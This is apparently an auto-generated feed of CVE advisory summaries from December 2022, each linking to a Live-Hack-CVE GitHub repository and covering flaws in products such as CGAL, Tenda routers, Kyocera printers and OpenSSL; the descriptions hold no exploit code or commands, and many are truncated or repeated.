**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28604](https://github.com/Live-Hack-CVE/CVE-2020-28604) create time: 2022-12-27T23:10:38Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28603](https://github.com/Live-Hack-CVE/CVE-2020-28603) create time: 2022-12-27T23:10:35Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28602](https://github.com/Live-Hack-CVE/CVE-2020-28602) create time: 2022-12-27T23:10:32Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35632](https://github.com/Live-Hack-CVE/CVE-2020-35632) create time: 2022-12-27T23:10:28Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35631](https://github.com/Live-Hack-CVE/CVE-2020-35631) create time: 2022-12-27T23:10:24Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35630](https://github.com/Live-Hack-CVE/CVE-2020-35630) create time: 2022-12-27T23:10:21Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35629](https://github.com/Live-Hack-CVE/CVE-2020-35629) create time: 2022-12-27T23:10:17Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28635](https://github.com/Live-Hack-CVE/CVE-2020-28635) create time: 2022-12-27T23:10:14Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28634](https://github.com/Live-Hack-CVE/CVE-2020-28634) create time: 2022-12-27T23:10:10Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28633](https://github.com/Live-Hack-CVE/CVE-2020-28633) create time: 2022-12-27T23:10:07Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28632](https://github.com/Live-Hack-CVE/CVE-2020-28632) create time: 2022-12-27T23:10:03Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28631](https://github.com/Live-Hack-CVE/CVE-2020-28631) create time: 2022-12-27T23:10:00Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28630](https://github.com/Live-Hack-CVE/CVE-2020-28630) create time: 2022-12-27T23:09:56Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28629](https://github.com/Live-Hack-CVE/CVE-2020-28629) create time: 2022-12-27T23:09:52Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28628](https://github.com/Live-Hack-CVE/CVE-2020-28628) create time: 2022-12-27T23:09:49Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28627](https://github.com/Live-Hack-CVE/CVE-2020-28627) create time: 2022-12-27T23:09:18Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28625](https://github.com/Live-Hack-CVE/CVE-2020-28625) create time: 2022-12-27T23:09:15Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28624](https://github.com/Live-Hack-CVE/CVE-2020-28624) create time: 2022-12-27T23:09:11Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28610](https://github.com/Live-Hack-CVE/CVE-2020-28610) create time: 2022-12-27T23:09:08Z

**Multiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28609](https://github.com/Live-Hack-CVE/CVE-2020-28609) create time: 2022-12-27T23:09:03Z

**A Command Injection issue in the traceroute feature on TP-Link TL-WR841N V13 (JP) with firmware versions prior to 201216 allows authenticated users to execute arbitrary code as root via shell metacharacters, a different vulnerability than CVE-2018-12577. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35576](https://github.com/Live-Hack-CVE/CVE-2020-35576) create time: 2022-12-27T23:08:29Z

**A resource exhaustion issue was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.0.1. An attacker in a privileged network position may be able to perform denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10005](https://github.com/Live-Hack-CVE/CVE-2020-10005) create time: 2022-12-27T23:08:26Z

**The vCenter Server contains multiple local privilege escalation vulnerabilities due to improper permissions of files and directories. An authenticated local user with non-administrative privilege may exploit these issues to elevate their privileges to root on vCenter Server Appliance. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22015](https://github.com/Live-Hack-CVE/CVE-2021-22015) create time: 2022-12-27T23:05:42Z

**Cross Site Scripting (XSS) vulnerability in TomExam 3.0 via p_name parameter to list.thtml. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34181](https://github.com/Live-Hack-CVE/CVE-2021-34181) create time: 2022-12-27T23:03:18Z

**Two heap-based buffer overflow vulnerabilities exists in the JPEG-JFIF lossless Huffman image parser functionality of Accusoft ImageGear 19.10. A specially-crafted file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger these vulnerabilities.This heap-based buffer overflow takes pla CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21947](https://github.com/Live-Hack-CVE/CVE-2021-21947) create time: 2022-12-27T23:01:29Z

**Two heap-based buffer overflow vulnerabilities exists in the JPEG-JFIF lossless Huffman image parser functionality of Accusoft ImageGear 19.10. A specially-crafted file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger these vulnerabilities.This heap-based buffer overflow takes pla CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21946](https://github.com/Live-Hack-CVE/CVE-2021-21946) create time: 2022-12-27T23:01:25Z

**Two heap-based buffer overflow vulnerabilities exist in the TIFF parser functionality of Accusoft ImageGear 19.10. A specially-crafted file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger these vulnerabilities.This heap-based buffer oveflow takes place trying to copy the second 1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21945](https://github.com/Live-Hack-CVE/CVE-2021-21945) create time: 2022-12-27T23:01:22Z

**Two heap-based buffer overflow vulnerabilities exist in the TIFF parser functionality of Accusoft ImageGear 19.10. A specially-crafted file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger these vulnerabilities.This heap-based buffer oveflow takes place trying to copy the first 12 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21944](https://github.com/Live-Hack-CVE/CVE-2021-21944) create time: 2022-12-27T23:01:10Z

**ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a str CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3712](https://github.com/Live-Hack-CVE/CVE-2021-3712) create time: 2022-12-27T23:00:19Z

**In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the dec CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3711](https://github.com/Live-Hack-CVE/CVE-2021-3711) create time: 2022-12-27T23:00:15Z

**** DISPUTED ** An issue was discovered in the character definitions of the Unicode Specification through 14.0. The specification allows an adversary to produce source code identifiers such as function names using homoglyphs that render visually identical to a target identifier. Adversaries can leverage this to inject c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42694](https://github.com/Live-Hack-CVE/CVE-2021-42694) create time: 2022-12-27T22:29:45Z

**Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21300](https://github.com/Live-Hack-CVE/CVE-2021-21300) create time: 2022-12-27T22:29:24Z

**baramundi Management Agent (bMA) in baramundi Management Suite (bMS) 2021 R1 and R2 and 2022 R1 allows remote code execution. This is fixed in 2022 R2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43747](https://github.com/Live-Hack-CVE/CVE-2022-43747) create time: 2022-12-27T22:29:07Z

**Python 3.x through 3.9.1 has a buffer overflow in PyCArg_repr in _ctypes/callproc.c, which may lead to remote code execution in certain Python applications that accept floating-point numbers as untrusted input, as demonstrated by a 1e300 argument to c_double.from_param. This occurs because sprintf is used unsafely. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3177](https://github.com/Live-Hack-CVE/CVE-2021-3177) create time: 2022-12-27T22:29:03Z

**avahi-daemon-check-dns.sh in the Debian avahi package through 0.8-4 is executed as root via /etc/network/if-up.d/avahi-daemon, and allows a local attacker to cause a denial of service or create arbitrary empty files via a symlink attack on files under /run/avahi-daemon. NOTE: this only affects the packaging for Debian CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26720](https://github.com/Live-Hack-CVE/CVE-2021-26720) create time: 2022-12-27T22:28:53Z

**The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23926](https://github.com/Live-Hack-CVE/CVE-2021-23926) create time: 2022-12-27T22:28:39Z

**json-schema is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3918](https://github.com/Live-Hack-CVE/CVE-2021-3918) create time: 2022-12-27T22:28:25Z

**A heap-based buffer overflow was found in jhead in version 3.06 in Get16u() in exif.c when processing a crafted file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3496](https://github.com/Live-Hack-CVE/CVE-2021-3496) create time: 2022-12-27T22:27:49Z

**Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33560](https://github.com/Live-Hack-CVE/CVE-2021-33560) create time: 2022-12-27T22:27:46Z

**A heap-buffer overflow was found in the copyIntoFrameBuffer function of OpenEXR in versions before 3.0.1. An attacker could use this flaw to execute arbitrary code with the permissions of the user running the application compiled against OpenEXR. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23169](https://github.com/Live-Hack-CVE/CVE-2021-23169) create time: 2022-12-27T22:27:43Z

**The ElGamal implementation in Libgcrypt before 1.9.4 allows plaintext recovery because, during interaction between two cryptographic libraries, a certain dangerous combination of the prime defined by the receiver's public key, the generator defined by the receiver's public key, and the sender's ephemeral exponents can CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40528](https://github.com/Live-Hack-CVE/CVE-2021-40528) create time: 2022-12-27T22:27:39Z

**An issue was discovered in ncurses through v6.2-1. _nc_captoinfo in captoinfo.c has a heap-based buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39537](https://github.com/Live-Hack-CVE/CVE-2021-39537) create time: 2022-12-27T22:27:36Z

**FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions a malicious server might trigger out of bound writes in a connected client. Connections using GDI or SurfaceCommands to send graphics updates to the client might send `0` width/height or out of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41160](https://github.com/Live-Hack-CVE/CVE-2021-41160) create time: 2022-12-27T22:27:13Z

**Hiredis is a minimalistic C client library for the Redis database. In affected versions Hiredis is vulnurable to integer overflow if provided maliciously crafted or corrupted `RESP` `mult-bulk` protocol data. When parsing `multi-bulk` (array-like) replies, hiredis fails to check if `count * sizeof(redisReply*)` can be CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32765](https://github.com/Live-Hack-CVE/CVE-2021-32765) create time: 2022-12-27T22:27:03Z

**A race problem was seen in the vt_k_ioctl in drivers/tty/vt/vt_ioctl.c in the Linux kernel, which may cause an out of bounds read in vt as the write access to vc_mode is not protected by lock-in vt_ioctl (KDSETMDE). The highest threat from this vulnerability is to data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3753](https://github.com/Live-Hack-CVE/CVE-2021-3753) create time: 2022-12-27T22:26:56Z

**A flaw was found in OpenEXR's hufDecode functionality. This flaw allows an attacker who can pass a crafted file to be processed by OpenEXR, to trigger an undefined right shift error. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20304](https://github.com/Live-Hack-CVE/CVE-2021-20304) create time: 2022-12-27T22:26:39Z

**A flaw was found in glib before version 2.63.6. Due to random charset alias, pkexec can leak content from files owned by privileged users to unprivileged ones under the right condition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3800](https://github.com/Live-Hack-CVE/CVE-2021-3800) create time: 2022-12-27T22:26:32Z

**Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33544](https://github.com/Live-Hack-CVE/CVE-2021-33544) create time: 2022-12-27T22:26:15Z

**This affects the package video.js before 7.14.3. The src attribute of track tag allows to bypass HTML escaping and execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23414](https://github.com/Live-Hack-CVE/CVE-2021-23414) create time: 2022-12-27T22:25:06Z

**An issue was discovered in GNOME GLib before 2.66.6 and 2.67.x before 2.67.3. The function g_bytes_new has an integer overflow on 64-bit platforms due to an implicit cast from 64 bits to 32 bits. The overflow could potentially lead to memory corruption. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27219](https://github.com/Live-Hack-CVE/CVE-2021-27219) create time: 2022-12-27T22:20:27Z

**An issue was discovered in GNOME GLib before 2.66.7 and 2.67.x before 2.67.4. If g_byte_array_new_take() was called with a buffer of 4GB or more on a 64-bit platform, the length would be truncated modulo 2**32, causing unintended length truncation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27218](https://github.com/Live-Hack-CVE/CVE-2021-27218) create time: 2022-12-27T22:20:24Z

**When creating temporary files, agent-to-controller access to create those files is only checked after they've been created in Jenkins 2.318 and earlier, LTS 2.303.2 and earlier. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21693](https://github.com/Live-Hack-CVE/CVE-2021-21693) create time: 2022-12-27T22:20:20Z

**In GL.iNet Goodcloud 1.0, insecure design allows remote attacker to access devices' admin panel. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44212](https://github.com/Live-Hack-CVE/CVE-2022-44212) create time: 2022-12-27T23:09:00Z

**In GL.iNet Goodcloud 1.1 Incorrect access control allows a remote attacker to access/change devices' settings. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44211](https://github.com/Live-Hack-CVE/CVE-2022-44211) create time: 2022-12-27T23:08:57Z

**An access control issue in APsystems ENERGY COMMUNICATION UNIT (ECU-C) Power Control Software V4.1NA, V3.11.4, W2.1NA, V4.1SAA, C1.2.2 allows attackers to access sensitive data and execute specific commands and functions with full admin rights without authenticating allows him to perform multiple attacks, such as attac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44037](https://github.com/Live-Hack-CVE/CVE-2022-44037) create time: 2022-12-27T23:08:53Z

**Incorrect default permissions in the installation folder for NI LabVIEW Command Line Interface (CLI) may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42718](https://github.com/Live-Hack-CVE/CVE-2022-42718) create time: 2022-12-27T23:08:49Z

**The IPsec VPN blade has a dedicated portal for downloading and connecting through SSL Network Extender (SNX). If the portal is configured for username/password authentication, it is vulnerable to a brute-force attack on usernames and passwords. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23746](https://github.com/Live-Hack-CVE/CVE-2022-23746) create time: 2022-12-27T23:08:46Z

**Multiple Xiongmai NVR devices, including MBD6304T V4.02.R11.00000117.10001.131900.00000 and NBD6808T-PL V4.02.R11.C7431119.12001.130000.00000, allow authenticated users to execute arbitrary commands as root, as exploited in the wild starting in approximately 2019. A remote and authenticated attacker, possibly using the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45045](https://github.com/Live-Hack-CVE/CVE-2022-45045) create time: 2022-12-27T23:08:43Z

**IXPdata EasyInstall 6.6.14725 contains an access control issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35120](https://github.com/Live-Hack-CVE/CVE-2022-35120) create time: 2022-12-27T23:08:39Z

**Stored cross-site scripting vulnerability in Kyocera Document Solutions MFPs and printers allows a remote authenticated attacker with an administrative privilege to inject arbitrary script. Affected products/versions are as follows: TASKalfa 7550ci/6550ci, TASKalfa 5550ci/4550ci/3550ci/3050ci, TASKalfa 255c/205c, TASKa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41830](https://github.com/Live-Hack-CVE/CVE-2022-41830) create time: 2022-12-27T23:08:36Z

**OS command injection vulnerability in Nako3edit, editor component of nadesiko3 (PC Version) v3.3.74 and earlier allows a remote attacker to obtain appkey of the product and execute an arbitrary OS command on the product. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42496](https://github.com/Live-Hack-CVE/CVE-2022-42496) create time: 2022-12-27T23:08:33Z

**Missing authorization vulnerability exists in Kyocera Document Solutions MFPs and printers, which may allow a network-adjacent attacker to alter the product settings without authentication by sending a specially crafted request. Affected products/versions are as follows: TASKalfa 7550ci/6550ci, TASKalfa 5550ci/4550ci/3 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41807](https://github.com/Live-Hack-CVE/CVE-2022-41807) create time: 2022-12-27T23:08:22Z

**A vulnerability has been found in Facepay 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /face-recognition-php/facepay-master/camera.php. The manipulation of the argument userId leads to authorization bypass. The attack can be launched remotely. The identifier VDB CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4281](https://github.com/Live-Hack-CVE/CVE-2022-4281) create time: 2022-12-27T23:08:18Z

**In widevine, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07446207; Issue ID: ALPS07446207. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32594](https://github.com/Live-Hack-CVE/CVE-2022-32594) create time: 2022-12-27T23:08:15Z

**Plaintext storage of a password vulnerability exists in +F FS040U software versions v2.3.4 and earlier, which may allow an attacker to obtain the login password of +F FS040U and log in to the management console. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43442](https://github.com/Live-Hack-CVE/CVE-2022-43442) create time: 2022-12-27T23:08:12Z

**In multiple products by Festo a remote unauthenticated attacker could use functions of an undocumented protocol which could lead to a complete loss of confidentiality, integrity and availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3270](https://github.com/Live-Hack-CVE/CVE-2022-3270) create time: 2022-12-27T23:08:08Z

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the limitSpeed parameter in the formSetClientState function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45647](https://github.com/Live-Hack-CVE/CVE-2022-45647) create time: 2022-12-27T23:08:05Z

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the limitSpeedUp parameter in the formSetClientState function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45646](https://github.com/Live-Hack-CVE/CVE-2022-45646) create time: 2022-12-27T23:08:01Z

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the firewallEn parameter in the formSetFirewallCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45650](https://github.com/Live-Hack-CVE/CVE-2022-45650) create time: 2022-12-27T23:07:58Z

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the devName parameter in the formSetDeviceName function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45648](https://github.com/Live-Hack-CVE/CVE-2022-45648) create time: 2022-12-27T23:07:55Z

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the formSetVirtualSer function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45651](https://github.com/Live-Hack-CVE/CVE-2022-45651) create time: 2022-12-27T23:07:51Z

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the endIp parameter in the formSetPPTPServer function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45649](https://github.com/Live-Hack-CVE/CVE-2022-45649) create time: 2022-12-27T23:07:30Z

**Cross-site request forgery (CSRF) vulnerability in +F FS040U software versions v2.3.4 and earlier, +F FS020W software versions v4.0.0 and earlier, +F FS030W software versions v3.3.5 and earlier, and +F FS040W software versions v1.4.1 and earlier allows an adjacent attacker to hijack the authentication of an administrat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43470](https://github.com/Live-Hack-CVE/CVE-2022-43470) create time: 2022-12-27T23:07:26Z

**Session information easily guessable vulnerability exists in Kyocera Document Solutions MFPs and printers, which may allow a network-adjacent attacker to log in to the product by spoofing a user with guessed session information. Affected products/versions are as follows: TASKalfa 7550ci/6550ci, TASKalfa 5550ci/4550ci/3 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41798](https://github.com/Live-Hack-CVE/CVE-2022-41798) create time: 2022-12-27T23:07:23Z

**Improper check or handling of exceptional conditions vulnerability in Nako3edit, editor component of nadesiko3 (PC Version) v3.3.74 and earlier allows a remote attacker to inject an invalid value to decodeURIComponent of nako3edit, which may lead the server to crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41777](https://github.com/Live-Hack-CVE/CVE-2022-41777) create time: 2022-12-27T23:07:20Z

**A path traversal vulnerability was addressed in Western Digital My Cloud Home, My Cloud Home Duo and SanDisk ibi which could allow an attacker to initiate installation of custom ZIP packages and overwrite system files. This could potentially lead to a code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29837](https://github.com/Live-Hack-CVE/CVE-2022-29837) create time: 2022-12-27T23:07:16Z

**A vulnerability, which was classified as problematic, has been found in Tribal Systems Zenario CMS 9.3.57595. This issue affects some unknown processing of the component Remember Me Handler. The manipulation leads to session fixiation. The attack may be initiated remotely. The exploit has been disclosed to the public a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4231](https://github.com/Live-Hack-CVE/CVE-2022-4231) create time: 2022-12-27T23:07:13Z

**A vulnerability was found in SpringBootCMS and classified as critical. Affected by this issue is some unknown functionality of the component Template Management. The manipulation leads to injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-214790 is the iden CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4282](https://github.com/Live-Hack-CVE/CVE-2022-4282) create time: 2022-12-27T23:07:09Z

**In keyinstall, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07439659; Issue ID: ALPS07439659. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32619](https://github.com/Live-Hack-CVE/CVE-2022-32619) create time: 2022-12-27T23:07:06Z

**In widevine, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07446228; Issue ID: ALPS07446228. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32598](https://github.com/Live-Hack-CVE/CVE-2022-32598) create time: 2022-12-27T23:07:02Z

**In widevine, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07446228; Issue ID: ALPS07446228. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32597](https://github.com/Live-Hack-CVE/CVE-2022-32597) create time: 2022-12-27T23:06:59Z

**In widevine, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07446213; Issue ID: ALPS07446213. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32596](https://github.com/Live-Hack-CVE/CVE-2022-32596) create time: 2022-12-27T23:06:55Z

**Pivotal Spring Framework through 5.3.16 suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or not occur, and authentication may be required. NOTE: the vendor's position is that untrus CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1000027](https://github.com/Live-Hack-CVE/CVE-2016-1000027) create time: 2022-12-27T21:47:46Z

